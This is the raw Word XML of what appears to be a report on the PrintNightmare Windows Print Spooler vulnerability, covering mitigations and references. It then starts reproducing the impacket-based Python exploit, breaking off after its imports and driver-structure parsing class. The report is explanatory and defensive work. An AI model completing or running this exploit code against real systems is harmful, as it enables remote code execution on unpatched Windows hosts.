            <wp:docPr id="20470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49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2946" cy="14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9D1F" w14:textId="77777777" w:rsidR="001014A8" w:rsidRDefault="001014A8" w:rsidP="00CC3945"/>
    <w:p w14:paraId="6D55FBA9" w14:textId="77777777" w:rsidR="003D69A8" w:rsidRPr="00CC3945" w:rsidRDefault="003D69A8" w:rsidP="00CC3945"/>
    <w:p w14:paraId="1F1590A7" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="004276EB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc214502073"/>
      <w:r>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00351FFB">
        <w:t xml:space="preserve"> Mitigatio</w:t>
      </w:r>
      <w:r>
        <w:t>ns</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="2441E6B9" w14:textId="1F3AA53A" w:rsidR="00087C7F" w:rsidRDefault="00702FA3" w:rsidP="00087C7F">
      <w:r w:rsidRPr="00087C7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Update Cumulative Patches:</w:t>
      </w:r>
      <w:r w:rsidRPr="00087C7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C96669">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Install cumulative and critical security patches</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> provided by </w:t>
      </w:r>
      <w:r w:rsidR="00507EA1">
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0050792A">
        <w:t xml:space="preserve">Newer cumulative updates (such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00087C7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>KB5004238</w:t>
      </w:r>
      <w:r w:rsidRPr="0050792A">
        <w:t xml:space="preserve"> for Server 2016 and </w:t>
      </w:r>
      <w:r w:rsidRPr="00087C7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>KB5004244</w:t>
      </w:r>
      <w:r w:rsidRPr="0050792A">
        <w:t xml:space="preserve"> for Server 2019)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59300A9B" w14:textId="1AED5F8A" w:rsidR="00702FA3" w:rsidRDefault="00087C7F" w:rsidP="00087C7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidRPr="009502D0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2313C489" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00087C7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="009502D0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2021-34527</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7099DD55" w14:textId="77777777" w:rsidR="00B01DCF" w:rsidRDefault="00B01DCF" w:rsidP="00702FA3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F209B8" w14:textId="3B52BFEE" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disable Print Spooler service for critical servers and workstations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001E176B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disable print spooler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F1558">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">services </w:t>
      </w:r>
      <w:r>
        <w:t>if not use, especially for critical servers such as Active Directory, DHCP Servers, and other servers or even workstations that don’t require printing capabilities.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00934C8B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47F99A35" wp14:editId="46A6469A">
            <wp:extent cx="2144939" cy="1812324"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="2083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2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662" cy="182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0A4C" w14:textId="77777777" w:rsidR="004B3EC6" w:rsidRDefault="004B3EC6" w:rsidP="00702FA3"/>
    <w:p w14:paraId="7B15FF24" w14:textId="1D38CD0A" w:rsidR="004D661D" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Policy Object Enforcement</w:t>
      </w:r>
      <w:r w:rsidRPr="001532C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Disable “Allow Print Spooler to accept client connections”</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004B095A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3635A15C" wp14:editId="60507E69">
            <wp:extent cx="4350926" cy="2042983"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="357782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8251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2508" cy="20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16D492" w14:textId="267BEBE9" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:r w:rsidRPr="005D0C9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Antivirus:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Microsoft Defender or any antivirus must be updated to latest virus database definition</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AB3973">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C92D72C" wp14:editId="18557B71">
            <wp:extent cx="4178040" cy="2887133"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="12028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197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6441" cy="28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8863" w14:textId="07CF7EB7" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3"/>
    <w:p w14:paraId="3670AC2D" w14:textId="6EB7C91D" w:rsidR="005A1BA5" w:rsidRPr="009733AE" w:rsidRDefault="00E2219D" w:rsidP="005A1BA5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc214502074"/>
      <w:r w:rsidRPr="009733AE">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="07AB7835" w14:textId="190FAB70" w:rsidR="004F0E14" w:rsidRDefault="00ED6182" w:rsidP="00E2219D">
      <w:r w:rsidRPr="00ED6182">
        <w:t xml:space="preserve">Cybereason Global SOC Team. (2021, July 6). </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6182">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>THREAT ALERT: PrintNightmare — Critical vulnerability in Windows Print Spooler</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6182">
        <w:t xml:space="preserve">. Cybereason. </w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00ED6182">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.cybereason.com/blog/research/threat-alert-printnightmare-critical-vulnerability-in-windows-print-spooler</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E24A0CD" w14:textId="2B7FF5C3" w:rsidR="006E452C" w:rsidRDefault="006E452C" w:rsidP="00E2219D">
      <w:r w:rsidRPr="006E452C">
        <w:t xml:space="preserve">Byatt, K. (2022, October). </w:t>
      </w:r>
      <w:r w:rsidRPr="006E452C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>What is PrintNightmare? The Windows Print Spooler exploit explained</w:t>
      </w:r>
      <w:r w:rsidRPr="006E452C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E452C">
        <w:t>PaperCut</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E452C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="006E452C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.papercut.com/blog/print_basics/windows-print-nightmare-explained/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F09519C" w14:textId="69998C21" w:rsidR="00E2219D" w:rsidRDefault="00D2675F" w:rsidP="00E2219D">
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidRPr="009502D0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/cube0x0/CVE-2021-1675</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5CBAF711" w14:textId="64A7AF4F" w:rsidR="00D2675F" w:rsidRDefault="00D2675F" w:rsidP="00E2219D">
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidRPr="009502D0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19A1FABE" w14:textId="78F05CA1" w:rsidR="00D2675F" w:rsidRDefault="00441FE9" w:rsidP="00D2675F">
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidRPr="009502D0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2021-34527</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F1ABF23" w14:textId="77777777" w:rsidR="00D2675F" w:rsidRDefault="00D2675F" w:rsidP="00E2219D"/>
    <w:p w14:paraId="79CCE732" w14:textId="77777777" w:rsidR="00FE2A78" w:rsidRDefault="00FE2A78" w:rsidP="00E2219D"/>
    <w:p w14:paraId="3AEFBA17" w14:textId="77777777" w:rsidR="00FE2A78" w:rsidRPr="00E2219D" w:rsidRDefault="00FE2A78" w:rsidP="00E2219D"/>
    <w:p w14:paraId="76B69AA2" w14:textId="360B1C94" w:rsidR="00784499" w:rsidRPr="006C6020" w:rsidRDefault="00784499" w:rsidP="00784499">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc214502075"/>
      <w:r w:rsidRPr="006C6020">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Source Code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="7463D0DB" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34506A27" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">from impacket.dcerpc.v5 import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>rprn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C05391B" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>from impacket.dcerpc.v5 import transport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6C799B" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>from impacket.dcerpc.v5.dtypes import NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F81FD02" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>impacket.structure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> import Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D41D6D" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>argparse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C79C76B" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E45891" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>pathlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6126A6E3" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="22DD481B" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E23EE08" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>class DRIVER_INFO_2_BLOB(Structure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636F618D" w14:textId="7AE84E5E" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>structure = (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FE445A" w14:textId="39C33645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cVersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>','&lt;L'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F90FA47" w14:textId="146324F8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NameOffset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>', '&lt;L'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DE3781" w14:textId="51132AC3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EnvironmentOffset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>', '&lt;L'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5304352A" w14:textId="50DCD3CB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DriverPathOffset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>', '&lt;L'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63787C46" w14:textId="5F429DCC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DataFileOffset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>', '&lt;L'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2044787A" w14:textId="677A7ACA" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>ConfigFileOffset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>', '&lt;L'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCE9B23" w14:textId="37D707F8" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:lastRenderedPageBreak/>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A227E1B" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="184CBD55" w14:textId="6B4DF179" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>def __</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>__(self, data = None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53083288" w14:textId="3CDCDA37" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>Structure.__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>__(self, data = data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C875E46" w14:textId="67D0A374" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="192"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70389F95" w14:textId="4A1B8D0E" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>fromString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(self, data, offset=0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474F1695" w14:textId="4F2B0320" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>Structure.fromString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(self, data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40222AEB" w14:textId="01D7AD2E" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>self['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>ConfigFileArray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">'] = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>self.rawData</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>[self['ConfigFileOffset</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']+offset:self</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>['DataFileOffset</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>offset</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>].decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>('utf-16-le')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D55C93" w14:textId="7B5EB8F9" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>self['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>DataFileArray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">'] = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>self.rawData</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>[self['DataFileOffset</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']+offset:self</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>['DriverPathOffset</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>offset</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>].decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>('utf-16-le')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094D6021" w14:textId="1B5C02F8" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>self['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>DriverPathArray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">'] = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>self.rawData</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>[self['DriverPathOffset</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']+offset:self</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>['EnvironmentOffset</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>offset</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>].decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>('utf-16-le')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786D74AD" w14:textId="6DFDE998" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>self['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>EnvironmentArray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">'] = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>self.rawData</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>[self['EnvironmentOffset</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']+offset:self</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>['NameOffset</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>offset</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>].decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>('utf-16-le')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2214E0" w14:textId="667C1931" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>#self['NameArray'] = self.rawData[self['NameOffset']+offset:len(self.rawData)].decode('utf-16-le')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28878AF3" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="72EA613E" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
